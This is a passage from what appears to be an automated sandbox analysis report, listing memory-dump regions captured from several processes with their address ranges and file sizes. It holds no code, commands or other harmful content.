                                                                                                                                                                                                                                                • memory/4220-287-0x00000000073D0000-0x000000000741C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                • memory/4220-277-0x0000000005740000-0x00000000057B6000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  472KB

                                                                                                                                                                                                                                                • memory/4220-284-0x00000000072C0000-0x00000000073CA000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                • memory/4220-278-0x0000000006D50000-0x0000000006D6E000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                • memory/4220-286-0x0000000007260000-0x000000000729C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  240KB

                                                                                                                                                                                                                                                • memory/4220-283-0x0000000007760000-0x0000000007D78000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                • memory/4492-127-0x000000006FEB0000-0x000000006FEFC000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                • memory/4616-281-0x000000001B960000-0x000000001B972000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                                                • memory/4616-282-0x000000001CF30000-0x000000001CF6C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  240KB

                                                                                                                                                                                                                                                • memory/4616-218-0x0000000000A70000-0x0000000000B0C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  624KB

                                                                                                                                                                                                                                                • memory/4616-280-0x000000001E630000-0x000000001E73A000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                • memory/4620-3886-0x0000000000EC0000-0x0000000000FBC000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1008KB

                                                                                                                                                                                                                                                • memory/4692-31-0x000000007502E000-0x000000007502F000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4692-3-0x0000000075020000-0x00000000757D1000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                • memory/4692-0-0x000000007502E000-0x000000007502F000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                • memory/4692-32-0x0000000075020000-0x00000000757D1000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  7.7MB

                                                                                                                                                                                                                                                • memory/4692-1-0x00000000004A0000-0x00000000004A8000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                • memory/4692-2-0x0000000004E20000-0x0000000004EBC000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  624KB

                                                                                                                                                                                                                                                • memory/4744-765-0x0000000000400000-0x00000000004C2000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  776KB

                                                                                                                                                                                                                                                • memory/4744-749-0x0000000000400000-0x00000000004C2000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  776KB

                                                                                                                                                                                                                                                • memory/4832-455-0x00000000001C0000-0x00000000004E4000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3.1MB

                                                                                                                                                                                                                                                • memory/5328-3970-0x0000000000EE0000-0x0000000000F30000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  320KB

                                                                                                                                                                                                                                                • memory/5736-4538-0x0000029D6AB40000-0x0000029D6AD02000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1.8MB

                                                                                                                                                                                                                                                • memory/5736-4539-0x0000029D6B240000-0x0000029D6B768000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  5.2MB

                                                                                                                                                                                                                                                • memory/5960-2750-0x00000000051E0000-0x00000000052BC000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  880KB

                                                                                                                                                                                                                                                • memory/5960-3826-0x00000000052C0000-0x000000000530C000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                • memory/5960-2749-0x0000000000370000-0x00000000005A6000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2.2MB

                                                                                                                                                                                                                                                • memory/5960-3825-0x0000000005030000-0x0000000005088000-memory.dmp

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  352KB